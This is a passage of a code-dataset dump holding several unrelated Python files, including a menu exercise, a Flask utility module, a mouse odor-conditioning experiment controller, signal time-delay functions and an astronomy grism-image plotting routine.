10\nMIN = 1\n\ndef readPosition():\n pos = int(input(\"Input a position between \" + str(MIN) + \" and \" + str(MAX) + \": \"))\n return pos\n\ndef displayMenu():\n print(\"l - for moving left\")\n print(\"r - for moving right\")\n print(\"Any other letter for quitting\")\n\ndef readChoice():\n choice = input(\"Input your choice: \")\n return choice\n\ndef newPosition(pos, choice):\n if choice == 'l':\n if pos > MIN:\n pos -= 1\n elif choice == 'r':\n if pos < MAX:\n pos += 1\n return pos\n\n# The main program starts here\nchoice = 'l'\npos = readPosition()\n\nwhile choice == 'l' or choice == 'r':\n displayMenu()\n choice = readChoice()\n pos = newPosition(pos, choice)\n print(\"New position is:\", pos)","sub_path":"Lokapróf/Jolaprof_prof/asdf.py","file_name":"asdf.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"649157946","text":"import os\r\nimport logging\r\nimport subprocess\r\n\r\nimport shared.modulebase\r\n\r\n\r\nclass Game(shared.modulebase.ModuleBase):\r\n\r\n def preferred_load_index(self) -> int:\r\n return 4\r\n\r\n def run_and_wait(self):\r\n eso_path = self.app.config.get('game.path')\r\n eso_exe = self.app.config.get('game.exe')\r\n command = [os.path.join(eso_path, eso_exe)]\r\n os.chdir(eso_path)\r\n process = subprocess.Popen(command)\r\n process.wait()\r\n\r\n def run_and_do_not_wait(self):\r\n eso_path = self.app.config.get('game.path')\r\n eso_exe = self.app.config.get('game.exe')\r\n logging.info('chdir to \\'{}\\''.format(eso_path))\r\n os.chdir(eso_path)\r\n logging.info('startfile \\'{}\\''.format(eso_exe))\r\n os.startfile(os.path.join(eso_path, eso_exe))\r\n","sub_path":"modules/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"35292124","text":"import Config\nimport math\n\nimport numpy as np\nfrom sklearn.base import TransformerMixin\n\n\nclass FFTAligner(TransformerMixin):\n def __init__(self):\n self.best_offset_ = None\n self.best_score_ = None\n self.get_score_ = False\n\n def fit(self, substring, vid_str, get_score=False):\n substring, vid_str = [\n list(map(int, s))\n if isinstance(s, str) else s\n for s in [substring, vid_str]\n ]\n substring, vid_str = map(lambda s: 2 * np.array(s).astype(float) - 1, [substring, vid_str])\n total_bits = math.log(len(substring) + len(vid_str), 2)\n total_length = int(2 ** math.ceil(total_bits))\n extra_zeros = total_length - len(substring) - len(vid_str)\n sub_fft = np.fft.fft(np.append(np.zeros(extra_zeros + len(vid_str)), substring))\n vid_fft = np.fft.fft(np.flip(np.append(vid_str, np.zeros(len(substring) + extra_zeros)), 0))\n convolve = np.real(np.fft.ifft(sub_fft * vid_fft))\n best_idx = np.argmax(convolve)\n self.best_offset_ = len(convolve) - 1 - best_idx - len(substring)\n self.best_score_ = convolve[best_idx]\n self.get_score_ = get_score\n return self\n\n def transform(self, *_):\n if self.get_score_:\n return self.best_score_, self.best_offset_\n else:\n return self.best_offset_\n\n\nif __name__ == '__main__' and Config.DEBUG is True:\n back = FFTAligner().fit_transform(\"111001\", \"11001\")\n print(back)\n if back == -1:\n print(\"Success\")\n else:\n print(\"Error\")\n","sub_path":"TachibanaAligner/FFTAligner.py","file_name":"FFTAligner.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"545965380","text":"#: 여기저기서 자꾸쓰는 함수 모음집\nfrom app import app, db\nfrom flask import request, session, make_response, jsonify\nfrom sqlalchemy import Table, MetaData, text, exc\nfrom flask_login import current_user\nfrom datetime import datetime, timedelta\nimport hashlib\nimport string\nimport random\nimport traceback\nimport io\n\nimport boto3\nS3 = boto3.client(\n 's3',\n aws_access_key_id=app.config['AWS_ACCESS_KEY_ID'],\n aws_secret_access_key=app.config['AWS_SECRET_ACCESS_KEY']\n # aws_session_token=SESSION_TOKEN,\n )\nBUCKET_NAME = ''\n\n\ndef convert_datetime4mysql(basedate):\n \"\"\"\n client에서 보내주는 datetime이 MySQL 포맷에 맞지 않기 때문에 포맷형식을 바꿔주는 함수입니다\n \"\"\"\n formatfrom = \"%a, %d %b %Y %H:%M:%S GMT\"\n formatto = \"%Y-%m-%d %H:%M:%S\"\n convertdate = datetime.strptime(basedate, formatfrom).strftime(formatto)\n return convertdate\n\n\ndef create_sha512_hash(password):\n m = hashlib.sha512()\n m.update(password.encode('utf-8'))\n return m.hexdigest()\n\n\ndef create_md5_hash(sth):\n md5 = hashlib.md5()\n md5.update(sth.encode('utf-8'))\n return md5.hexdigest()\n\n\ndef create_sha1_token(sth, size=13):\n \"\"\"\n 토큰 만들기\n sth과 현재시간(UTC)을 가지고 해싱하여 토큰을 만든다.\n\n :param sth: 이 함수를 사용하는 어딘가에서 쓰이는 아무 변수\n :param len: 원하는 토큰의 길이\n :return:\n \"\"\"\n m = hashlib.sha1()\n\n t1 = sth + str(datetime.utcnow())\n m.update(t1.encode('utf-8'))\n t2 = m.hexdigest()\n t3 = t2 + string.ascii_uppercase\n\n token = ''.join(random.choice(t3) for _ in range(size))\n return token\n\n\ndef upload_photo_to_bytes_on_s3(picture, mimetype, name):\n \"\"\"\n S3에 Bytes로 사진 저장하기\n :param picture: 사진, bytes\n :param mimetype:\n :param name:\n :return: S3에 저장한 이름과 URL + 성공유무\n \"\"\"\n try:\n t = ''\n pname = ''\n\n S3.upload_fileobj(io.BytesIO(picture), BUCKET_NAME, pname)\n\n # purl = S3.generate_presigned_url(\n # ClientMethod='get_object',\n # Params={\n # 'Bucket': BUCKET_NAME,\n # 'Key': pname\n # }\n # )\n\n return pname, True\n except:\n traceback.print_exc()\n return None, False\n","sub_path":"app/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"42518411","text":"'''\nCreated on July 17, 2019\nthe code for running two setup in parallel\n@author: Selina Qian\n'''\nfrom ScopeFoundry import Measurement\nimport datetime\nimport numpy as np\nimport random\nimport pickle\nimport time\nfrom AntCamHW.daq_do.daq_do_dev import DAQSimpleDOTask\nfrom AntCamHW.daq_di.daq_di_dev import DAQSimpleDITask\nfrom openpyxl import Workbook\nimport os\nimport logging\n\nclass OdorGen(object):\n def __init__(self,odorindex):\n self.odorindex = odorindex\n self.odors_DAQ = []\n\n\n def assign_odor(self):\n # initiate all the odor solenoids\n for item in self.odorindex:\n self.odors_DAQ.append(DAQSimpleDOTask('Dev2_SELECT/port0/line{}'.format(item)))\n print('Odor {} has been properly assigned'.format(self.odorindex))\n\n def set_rewardodor(self, index: list):\n reward_odor = self.odors_DAQ[index[0]]\n non_reward_odor = self.odors_DAQ[index[1]]\n if len(self.odorindex) == 3:\n control_odor = self.odors_DAQ[index[2]]\n\n print('reward odor, unrewarded odor and control odor loaded')\n return reward_odor, non_reward_odor, control_odor\n else:\n print('reward odor, unrewarded odor loaded')\n return reward_odor, non_reward_odor\n\n def initiate(self):\n for odor in self.odors_DAQ:\n odor.low()\n print('Odor initiation: status low')\n\n def close(self):\n for odor in self.odors_DAQ:\n odor.close()\n print('Connection has been closed')\n\n\nclass SelinaTraining(Measurement):\n def __init__(self):\n # please change this according to mouse\n # two mice together\n self.mouse = ['C35','C36'] #OT-GC-2\n\n self.phase = 'cond' #'cond', 'deg','C_control','close','far'\n self.condition = 'Pav'\n self.numtrials = 20\n\n self.list = [7, 6, 5]\n # two file saving path\n self.events_path_0 = \"C:/Users/MurthyLab/Desktop/Selina_lab_computer_data/experiment_data_2021_7_{0}/{1}/\".format(\n self.condition,self.mouse[0])\n self.events_path_1 = \"C:/Users/MurthyLab/Desktop/Selina_lab_computer_data/experiment_data_2021_7_{0}/{1}/\".format(\n self.condition, self.mouse[1])\n self.events_filename = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M\")+'{}.xlsx'.format(self.phase)\n\n self.filename_0 = self.events_path_0 + self.events_filename\n self.filename_1 = self.events_path_1 + self.events_filename\n\n self.odor_index = [1,0,2] #odor list index position 0 is reward, 1 is unrewarded, 2 is control c odor; so here, 7 is unrewarded, 6 is reward and 5 is c odor\n if self.condition == 'Operant':\n self.operant = True\n self.licknum = 1\n else:\n self.operant = False\n self.licknum = 0\n\n\n # pre training\n self.p_go = 0.4#0.5\n self.p_reward_go = 0.75\n self.p_no_go = 0.2#0.2\n self.p_empty = 0.4#0.3\n if self.phase == 'cond':\n self.p_reward_empty = 0 # 0.3\n else: # 'deg','C-control','close','far'\n self.p_reward_empty = 0.75\n\n\n self.counter = np.zeros(9)\n\n self.duration_rec_on_before = 1\n self.duration_odor_on = 1\n self.duration_odor_to_action = 0\n self.duration_action_window = 2.5\n self.duration_water_large = 0.08 #0.1\n self.duration_rec_on_after = 1\n self.duration_ITI = np.random.exponential(1, size=self.numtrials)\n\n self.waterline_0 = 0\n self.waterline_1 = 1\n\n\n def run(self):\n try:\n os.makedirs(self.events_path_0)\n os.makedirs(self.events_path_1)\n except OSError:\n print(\"The directory %s existed\" % self.events_path_0)\n else:\n print(\"Successfully created the directory %s \" % self.events_path_0)\n logname_0 = self.filename_0[0:-5] + '.log'\n logname_1 = self.filename_1[0:-5] + '.log'\n logging.basicConfig(filename=logname_0, level=logging.DEBUG)\n logging.info(self.__dict__)\n logging.basicConfig(filename=logname_1, level=logging.DEBUG)\n logging.info(self.__dict__)\n self.lick_0 = DAQSimpleDITask('Dev2_SELECT/port2/line0')\n self.lick_1 = DAQSimpleDITask('Dev2_SELECT/port2/line1')\n print('water done')\n odors_cue = OdorGen(self.list)\n odors_cue.assign_odor()\n self.reward_odor, self.non_reward_odor, self.control_odor = odors_cue.set_rewardodor(index=self.odor_index)\n odors_cue.initiate()\n # odors_cue.odors_DAQ[i]\n print('odor done')\n\n self.water_0 = DAQSimpleDOTask('Dev2_SELECT/port0/line{}'.format(self.waterline_0))\n self.water_0.low()\n self.water_1 = DAQSimpleDOTask('Dev2_SELECT/port0/line{}'.format(self.waterline_1))\n self.water_1.low()\n # self.OdorOnCopy = DAQSimpleDOTask('Dev3/port2/line5')\n # self.OdorOnCopy.low()\n\n\n # EVENT CODES\n # video recording start / start trial = 101\n # end trial = 100\n # lick on = 11, lick off = 10\n\n # reward odor on = 131, off = 130, water on = 51, water off = 50\n # no reward odor on = 141, off = 140\n # c control odor on = 161, off = 160, water on = 51, water off = 50\n\n # create two excel workbooks\n self.wb0 = Workbook()\n self.ws0 = self.wb0.active\n self.wb1 = Workbook()\n self.ws1 = self.wb1.active\n\n\n #generate trial type\n\n # generate trial type\n trialtypes = np.zeros(self.numtrials)\n for i in range(int(self.numtrials/20)):\n train_go = np.zeros(int(round(20 * self.p_go * self.p_reward_go))) # code 0\n train_nogo = np.ones(int(20 * self.p_no_go)) # code 1\n temp_comb1 = np.concatenate((train_go,train_nogo))\n train_go_omission = np.ones(int(round(20 * self.p_go * (1 - self.p_reward_go)))) * 3 # code 3\n temp_comb1 = np.concatenate((temp_comb1, train_go_omission))\n if self.phase == 'cond':\n train_empty = np.ones(int(20 * self.p_empty* (1-self.p_reward_empty))) * 2 # code 2\n\n temp_comb1 = np.concatenate((temp_comb1, train_empty))\n elif self.phase == 'deg':\n train_unpredwater = np.ones(int(20 * self.p_empty* self.p_reward_empty)) * 4 # code 4\n temp_comb1 = np.concatenate((temp_comb1, train_unpredwater))\n train_empty = np.ones(int(20 * self.p_empty * (1 - self.p_reward_empty))) * 2 # code 2\n temp_comb1 = np.concatenate((temp_comb1, train_empty))\n elif self.phase == 'close':\n train_unpredwater = np.ones(int(20 * self.p_empty * self.p_reward_empty)) * 7 # code 4\n temp_comb1 = np.concatenate((temp_comb1, train_unpredwater))\n train_empty = np.ones(int(20 * self.p_empty * (1 - self.p_reward_empty))) * 2 # code 2\n temp_comb1 = np.concatenate((temp_comb1, train_empty))\n elif self.phase == 'far':\n train_unpredwater = np.ones(int(20 * self.p_empty * self.p_reward_empty)) * 8 # code 4\n temp_comb1 = np.concatenate((temp_comb1, train_unpredwater))\n train_empty = np.ones(int(20 * self.p_empty * (1 - self.p_reward_empty))) * 2 # code 2\n temp_comb1 = np.concatenate((temp_comb1, train_empty))\n elif self.phase == 'C_control':\n train_ccontrol = np.ones(int(20 * self.p_empty * self.p_reward_empty)) * 5 # code 4\n temp_comb1 = np.concatenate((temp_comb1, train_ccontrol))\n train_ccontrol_nogo = np.ones(int(20 * self.p_empty * (1 - self.p_reward_empty))) * 6 # code 2\n print(len(train_ccontrol_nogo))\n print(len(train_ccontrol))\n temp_comb1 = np.concatenate((temp_comb1, train_ccontrol_nogo))\n\n temp_comb2 = temp_comb1.copy()\n random.shuffle(temp_comb2)\n trialtypes[20*i:20*(i+1)] = temp_comb2\n self.trialstype = trialtypes\n print('================== Trial Types =================')\n print(trialtypes)\n for t in range(0, self.numtrials):\n print('================================================')\n print('trial number: ', t)\n\n d0 = self.ws0.cell(row=(self.ws0.max_row + 1), column=1, value=time.clock())\n d0 = self.ws0.cell(row=self.ws0.max_row, column=2, value=101) #trial start\n d0 = self.ws0.cell(row=self.ws0.max_row, column=3, value= 'trial{}'.format(int(trialtypes[t]))) #trial type\n\n d1 = self.ws1.cell(row=(self.ws1.max_row + 1), column=1, value=time.clock())\n d1 = self.ws1.cell(row=self.ws1.max_row, column=2, value=101) # trial start\n d1 = self.ws1.cell(row=self.ws1.max_row, column=3, value='trial{}'.format(int(trialtypes[t]))) # trial type\n # code: 0--go w rward; 1--no go; 2--empty; 3--go w/o reward; 4 --unpred water; 5 -- c control odor; 6 -- c control odor w/o\n if int(trialtypes[t]) in [7,8]:\n\n # main training program\n self.run_trial_type(int(trialtypes[t]))\n\n\n else:\n self.check_licking_1spout(self.duration_rec_on_before)\n # main training program\n self.run_trial_type(int(trialtypes[t]))\n\n self.check_licking_1spout(self.duration_rec_on_after)\n # self.settings.save_video.update_value(False):\n self.check_licking_1spout(self.duration_ITI[t])\n\n d0 = self.ws0.cell(row=(self.ws0.max_row + 1), column=1, value=time.clock())\n d0 = self.ws0.cell(row=self.ws0.max_row, column=2, value=100) # end\n\n d1 = self.ws1.cell(row=(self.ws1.max_row + 1), column=1, value=time.clock())\n d1 = self.ws1.cell(row=self.ws1.max_row, column=2, value=100) #end\n self.wb0.save(self.filename_0)\n self.wb1.save(self.filename_1)\n odors_cue.initiate()\n odors_cue.close()\n self.water_0.low()\n self.water_0.close()\n self.water_1.low()\n self.water_1.close()\n print('FINISHED ASSOCIATION TRAINING')\n\n def check_licking_1spout(self, interval,check_action=False):\n checkperiod = 0.002\n timeout = time.time() + interval\n reward_on = True # this is used for Pav or Operant\n right_lick_last = 0\n left_lick_last = 0\n count = 0\n while time.time() < timeout:\n right_lick = self.lick_0.read()\n # print('right lick', right_lick)\n\n left_lick = self.lick_1.read()\n # print('left lick', left_lick)\n if right_lick != right_lick_last:\n if right_lick:\n print('Lick 0')\n d0 = self.ws0.cell(row=(self.ws0.max_row + 1), column=1, value=time.clock())\n d0= self.ws0.cell(row=self.ws0.max_row, column=2, value=11)\n\n # self.save_training()\n if check_action:\n count += 1\n else:\n d0 = self.ws0.cell(row=(self.ws0.max_row + 1), column=1, value=time.clock())\n d0 = self.ws0.cell(row=self.ws0.max_row, column=2, value=10)\n\n else:\n pass\n\n if left_lick != left_lick_last:\n if left_lick:\n print('Lick 1')\n d1 = self.ws1.cell(row=(self.ws1.max_row + 1), column=1, value=time.clock())\n d1 = self.ws1.cell(row=self.ws1.max_row, column=2, value=11)\n\n # self.save_training()\n if check_action:\n count += 1\n else:\n d1 = self.ws1.cell(row=(self.ws1.max_row + 1), column=1, value=time.clock())\n d1 = self.ws1.cell(row=self.ws1.max_row, column=2, value=10)\n\n else:\n pass\n right_lick_last = right_lick\n left_lick_last = left_lick\n time.sleep(checkperiod)\n if check_action and count >= self.licknum:\n\n print('licking activate reward')\n elif check_action and count < self.licknum:\n print('not enough licking')\n reward_on = False\n return reward_on\n\n def run_trial_type(self, types):\n odor_on = False\n reward_on = False\n is_control = False\n if types == 0:\n print('go trial ' + str(int(self.counter[types])))\n odor_on = True # contingency odor comes\n is_go = True\n r_code = [131, 130]\n w_code = [51, 50]\n self.run_odor_module(odor_on, is_go, is_control, r_code)\n self.check_licking_1spout(self.duration_odor_to_action)\n reward_on = self.check_licking_1spout(self.duration_action_window, self.operant) ### can be a problem\n self.run_reward_module(reward_on, w_code)\n\n elif types == 1:\n print('no go trial ' + str(int(self.counter[types])))\n\n odor_on = True\n is_go = False\n r_code = [141, 140]\n w_code = [61, 60]\n self.run_odor_module(odor_on,is_go, is_control, r_code)\n self.check_licking_1spout(self.duration_odor_to_action+self.duration_action_window)\n reward_on = False\n self.run_reward_module(reward_on, w_code)\n elif types == 5:\n print('control C trial ' + str(int(self.counter[types])))\n\n odor_on = True\n is_go = False\n is_control = True\n r_code = [161, 160]\n w_code = [51, 50]\n self.run_odor_module(odor_on,is_go, is_control, r_code)\n self.check_licking_1spout(self.duration_odor_to_action+self.duration_action_window)\n reward_on = self.check_licking_1spout(self.duration_action_window, self.operant)\n self.run_reward_module(reward_on, w_code)\n\n elif types == 2:\n print('empty trial ' + str(int(self.counter[types])))\n # odor false: control odor comes\n w_code = [71, 70]# not used\n # self.run_odor_module(odor_on, r_code)\n self.check_licking_1spout(self.duration_odor_on)\n self.check_licking_1spout(self.duration_odor_to_action+self.duration_action_window)\n reward_on = False\n self.run_reward_module(reward_on, w_code)\n\n elif types == 3:\n print('go omission trial ' + str(int(self.counter[types])))\n odor_on = True # contingency odor comes\n is_go = True\n r_code = [131, 130]\n w_code = [51, 50]\n self.run_odor_module(odor_on, is_go, is_control, r_code)\n self.check_licking_1spout(self.duration_odor_to_action + self.duration_action_window)\n self.run_reward_module(reward_on, w_code)\n\n elif types == 6:\n print('c odor omission ' + str(int(self.counter[types])))\n odor_on = True # contingency odor comes\n is_go = False\n is_control = True\n r_code = [161, 160]\n w_code = [51, 50]\n self.run_odor_module(odor_on, is_go, is_control, r_code)\n self.check_licking_1spout(self.duration_odor_to_action + self.duration_action_window)\n self.run_reward_module(reward_on, w_code)\n\n elif types == 4:\n print('unpredicted water trial ' + str(int(self.counter[types])))\n w_code = [51, 50]\n self.check_licking_1spout(self.duration_odor_on)\n self.check_licking_1spout(self.duration_odor_to_action)\n reward_on = self.check_licking_1spout(self.duration_action_window, self.operant)\n self.run_reward_module(reward_on, w_code)\n\n elif types == 7:\n print('close unpredicted water trial ' + str(int(self.counter[types])))\n w_code = [51, 50]\n reward_on = self.check_licking_1spout(0, self.operant)\n self.run_reward_module(reward_on, w_code)\n self.check_licking_1spout(self.duration_odor_on+2)\n self.check_licking_1spout(self.duration_action_window)\n\n elif types == 8:\n print('far unpredicted water trial ' + str(int(self.counter[types])))\n w_code = [51, 50]\n self.check_licking_1spout(self.duration_odor_on)\n self.check_licking_1spout(self.duration_odor_to_action+2)\n reward_on = self.check_licking_1spout(self.duration_action_window, self.operant)\n self.run_reward_module(reward_on, w_code)\n self.counter[types] += 1\n\n\n\n def run_odor_module(self, odor_on, is_go, is_control, r_code):\n if odor_on:\n print('opening odor port')\n if is_go and not is_control:\n self.reward_odor.high()\n elif not is_go and not is_control:\n self.non_reward_odor.high()\n elif is_control:\n self.control_odor.high()\n # self.OdorOnCopy.high() # ???\n d0 = self.ws0.cell(row=(self.ws0.max_row + 1), column=1, value=time.clock())\n d0 = self.ws0.cell(row=self.ws0.max_row, column=2, value=r_code[0])\n d1 = self.ws1.cell(row=(self.ws1.max_row + 1), column=1, value=time.clock())\n d1 = self.ws1.cell(row=self.ws1.max_row, column=2, value=r_code[0])\n # self.save_training()\n self.check_licking_1spout(self.duration_odor_on)\n print('closing odor port')\n if is_go and not is_control:\n self.reward_odor.low()\n elif not is_go and not is_control:\n self.non_reward_odor.low()\n elif is_control:\n self.control_odor.low()\n d0 = self.ws0.cell(row=(self.ws0.max_row + 1), column=1, value=time.clock())\n d0 = self.ws0.cell(row=self.ws0.max_row, column=2, value=r_code[1])\n d1 = self.ws1.cell(row=(self.ws1.max_row + 1), column=1, value=time.clock())\n d1 = self.ws1.cell(row=self.ws1.max_row, column=2, value=r_code[1])\n else:\n self.check_licking_1spout(self.duration_odor_on)\n\n def run_reward_module(self, reward_on, w_code):\n if reward_on:\n # modify! give water if licks three times within 1 s\n print('opening water valve')\n self.water_0.high()\n self.water_1.high()\n\n d0 = self.ws0.cell(row=(self.ws0.max_row + 1), column=1, value=time.clock())\n d0 = self.ws0.cell(row=self.ws0.max_row, column=2, value=w_code[0])\n d1 = self.ws1.cell(row=(self.ws1.max_row + 1), column=1, value=time.clock())\n d1 = self.ws1.cell(row=self.ws1.max_row, column=2, value=w_code[0])\n self.check_licking_1spout(self.duration_water_large) # this parameter hasn't een defined\n print('closing water valve')\n self.water_0.low()\n self.water_1.low()\n d0 = self.ws0.cell(row=(self.ws0.max_row + 1), column=1, value=time.clock())\n d0 = self.ws0.cell(row=self.ws0.max_row, column=2, value=w_code[1])\n d1 = self.ws1.cell(row=(self.ws1.max_row + 1), column=1, value=time.clock())\n d1 = self.ws1.cell(row=self.ws1.max_row, column=2, value=w_code[1])\n else:\n self.check_licking_1spout(self.duration_water_large)\n\n\n# def camera_action(self):\n# '''\n# format the image properly\n# '''\n# try:\n# wide_image = self.wide_cam.read()\n# wide_image_data = self.wide_cam.to_numpy(wide_image)\n# self.wide_disp_queue.put(wide_image_data)\n#\n# if self.settings.save_video.value() and self.settings.in_trial.value() :\n# self.recorder.save_frame(self.settings.filename.value(),wide_image)\n#\n# except Exception as ex:\n# print('Error : %s' % ex)\n\n\n\n\n\ntest = SelinaTraining()\nprint('start')\ntest.run()\n\n\n","sub_path":"AntCamMS/Selina_CD_two_setup_v1.py","file_name":"Selina_CD_two_setup_v1.py","file_ext":"py","file_size_in_byte":19990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"270215960","text":"class Solution:\n # @param num: a rotated sorted array\n # @return: the minimum number in the array\n def findMin(self, num):\n # write your code here\n if num == None or len(num) == 0:\n return 0\n front = 0\n end = len(num)-1\n\n result = sys.maxint\n while front <= end and front >=0:\n mid = (front+end)/2\n # case 1: no in orded subarray\n if num[front] > num[end] :\n front = mid+1\n else:\n # case 2: already in a orded subarray, search for the lowest value\n if result > num[front]:\n result = num[front]\n front -= 1\n end = mid - 1\n\n return result\n","sub_path":"downloads/code/LintCode/Find-Minimum-in-Rotated-Array.py","file_name":"Find-Minimum-in-Rotated-Array.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"550925657","text":"import numpy as np\nimport math\nfrom scipy.signal import hilbert\nimport torch\nfrom utils import *\ntorch.set_default_tensor_type('torch.cuda.FloatTensor')\nimport cmath\nimport matplotlib.pyplot as plt\n\n\n# 0 error in unit test\ndef torchTimeDelay(x, fs, tau):\n # Delay a signal in time\n df = fs / torch.tensor([len(x) * 1.0], requires_grad=True)\n f_ind = torch.linspace(0, len(x) - 1, steps=len(x))\n f = f_ind * df.item()\n f[f > (fs.item() / 2)] -= fs.item()\n\n arg = 2*torch.tensor([math.pi])*tau*f\n sign = torch.tensor([-1.0], requires_grad=True)\n pr = compExp(arg, sign)\n X = torch.fft(torchHilbert(x), 1)\n tsd = torch.ifft(compMul(X, pr), 1)[:, 0] # Only return the real values\n return tsd.cuda()\n\n\ndef timeDelay(x, fs, tau):\n # Delay a signal in time\n df = fs / len(x)\n f = np.linspace(0, len(x) - 1, len(x)) * df\n f[f > (fs / 2)] = f[f > (fs / 2)] - fs\n arg = 2 * math.pi*tau*f\n pr = np.exp(-1j * 2 * math.pi * tau * f)\n #print(pr)\n\n #print(pr)\n\n if np.isreal(x).any():\n X = np.fft.fft(hilbert(x))\n tsd = (np.fft.ifft(np.multiply(X, pr))).real\n else:\n X = np.fft(x)\n tsd = np.fft.ifft(np.multiply(X, np.conj(pr)))\n return tsd\n","sub_path":"timeDelay.py","file_name":"timeDelay.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"522508310","text":"# Kornpob Bhirombhakdi\n# kbhirombhakdi@stsci.edu\n\nfrom astropy.io import fits\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef show_overview(gfile,dfile,xyd,xyref,xh,yh,ww,objname,save=False,container=None,\n params={'figsize':(10,10),\n '221':{'minmax':(5.,99.),'cmap':'viridis','s':30,'facecolor':'None','edgecolor':'red','fontsize':12,'title':'default'},\n '222':{'minmax':(5.,99.),'cmap':'viridis','s':30,'facecolor':'None','edgecolor':'red','padxy':(50,50),'fontsize':12,'title':'default'},\n '223':{'minmax':(5.,99.),'cmap':'viridis','s':30,'facecolor':'None','edgecolor':'red','color':'red','ls':'-','lw':4,'alpha':0.6,'fontsize':12,'title':'default'},\n '224':{'minmax':(5.,99.),'cmap':'viridis','s':30,'facecolor':'None','edgecolor':'red','color':'red','ls':'-','lw':4,'alpha':0.6,'padxy':(50,50),'tickperx':50,'annotate_marker':'ro','annotate_color':'red','annotate_fontsize':8,'annotate_rotation':30.,'fontsize':12,'title':'default'},\n }\n ):\n \"\"\"\n show_overview plots 2x2 of direct and grism images with zoom-in to the object location.\n - gfile = (path to grism file, extension)\n - dfile = (path to direct file, extension)\n - xyd = (pixX,pixY) of the object in the direct image\n - xyref = (xref,yref) of the object in the grism image\n - xh,yh,ww = trace and wavelength map\n - objname = object name which will be used for the plot title\n - save = True if user wants an output file for the plot, given container\n - params = customizable plot parameters\n \"\"\"\n pixx,pixy = xyd\n xref,yref = xyref\n xg,yg = xh+xref,yh+yref\n plt.figure(figsize=params['figsize'])\n # 221\n ax1 = plt.subplot(2,2,1)\n fontsize = params['221']['fontsize']\n tmpdata = fits.open(dfile[0])[dfile[1]].data\n m = np.isfinite(tmpdata)\n vmin,vmax = np.percentile(tmpdata[m],params['221']['minmax'][0]),np.percentile(tmpdata[m],params['221']['minmax'][1])\n ax1.imshow(tmpdata,origin='lower',cmap=params['221']['cmap'],vmin=vmin,vmax=vmax)\n ax1.scatter(pixx,pixy,s=params['221']['s'],facecolor=params['221']['facecolor'],edgecolor=params['221']['edgecolor'])\n if params['221']['title'] == 'default':\n tmpheader = fits.open(dfile[0])[0].header\n string = '{0} {1} {2} {3}'.format(objname,tmpheader['ROOTNAME'],tmpheader['DATE-OBS'],tmpheader['FILTER'])\n string += '\\nEXPSTART={0:.3f} EXPTIME={1:.3f}'.format(tmpheader['EXPSTART'],tmpheader['EXPTIME'])\n else:\n string = params['221']['title']\n ax1.set_title(string,fontsize=fontsize)\n # 222\n ax2 = plt.subplot(2,2,2)\n fontsize = params['222']['fontsize']\n dx,dy = params['222']['padxy']\n tmpdata = fits.open(dfile[0])[dfile[1]].data\n m = np.isfinite(tmpdata)\n vmin,vmax = np.percentile(tmpdata[m],params['222']['minmax'][0]),np.percentile(tmpdata[m],params['222']['minmax'][1])\n ax2.imshow(tmpdata,origin='lower',cmap=params['222']['cmap'],vmin=vmin,vmax=vmax)\n ax2.scatter(pixx,pixy,s=params['222']['s'],facecolor=params['222']['facecolor'],edgecolor=params['222']['edgecolor'])\n ax2.set_xlim(pixx-dx,pixx+dx)\n ax2.set_ylim(pixy-dy,pixy+dy)\n if params['222']['title'] == 'default':\n string = 'xyd = {0:.1f},{1:.1f}'.format(pixx,pixy)\n else:\n string = params['222']['title']\n ax2.set_title(string,fontsize=fontsize)\n # 223\n ax3 = plt.subplot(2,2,3)\n fontsize = params['223']['fontsize']\n tmpdata = fits.open(gfile[0])[gfile[1]].data\n m = np.isfinite(tmpdata)\n vmin,vmax = np.percentile(tmpdata[m],params['223']['minmax'][0]),np.percentile(tmpdata[m],params['223']['minmax'][1])\n ax3.imshow(tmpdata,origin='lower',cmap=params['223']['cmap'],vmin=vmin,vmax=vmax)\n ax3.plot(xg,yg,color=params['223']['color'],ls=params['223']['ls'],lw=params['223']['lw'],alpha=params['223']['alpha'])\n if params['223']['title'] == 'default':\n tmpheader = fits.open(gfile[0])[0].header\n string = '{0} {1} {2} {3}'.format(objname,tmpheader['ROOTNAME'],tmpheader['DATE-OBS'],tmpheader['FILTER'])\n string += '\\nEXPSTART={0:.3f} EXPTIME={1:.3f}'.format(tmpheader['EXPSTART'],tmpheader['EXPTIME'])\n else:\n string = params['223']['title'] \n ax3.set_title(string,fontsize=fontsize)\n # 224\n ax4 = plt.subplot(2,2,4)\n fontsize = params['224']['fontsize']\n tickperx = params['224']['tickperx']\n dx,dy = params['224']['padxy']\n annotate_marker = params['224']['annotate_marker']\n annotate_color = params['224']['annotate_color']\n annotate_fontsize = params['224']['annotate_fontsize']\n annotate_rotation = params['224']['annotate_rotation']\n tmpdata = fits.open(gfile[0])[gfile[1]].data\n m = np.isfinite(tmpdata) \n vmin,vmax = np.percentile(tmpdata[m],params['224']['minmax'][0]),np.percentile(tmpdata[m],params['224']['minmax'][1])\n ax4.imshow(tmpdata,origin='lower',cmap=params['224']['cmap'],vmin=vmin,vmax=vmax)\n ax4.plot(xg,yg,color=params['224']['color'],ls=params['224']['ls'],lw=params['224']['lw'],alpha=params['224']['alpha'])\n for i,ii in enumerate(xg):\n if (i in {0,len(xg)-1}) or (np.mod(i,tickperx)==0):\n label = '{0}A'.format(int(ww[i]))\n ax4.plot(xg[i],yg[i],annotate_marker)\n ax4.annotate(label,(xg[i],yg[i]),\n textcoords='offset points',\n xytext=(0,10),\n ha='center',\n fontsize=annotate_fontsize,\n rotation=annotate_rotation,\n color=annotate_color\n )\n ax4.set_xlim(xg.min()-dx,xg.max()+dx)\n 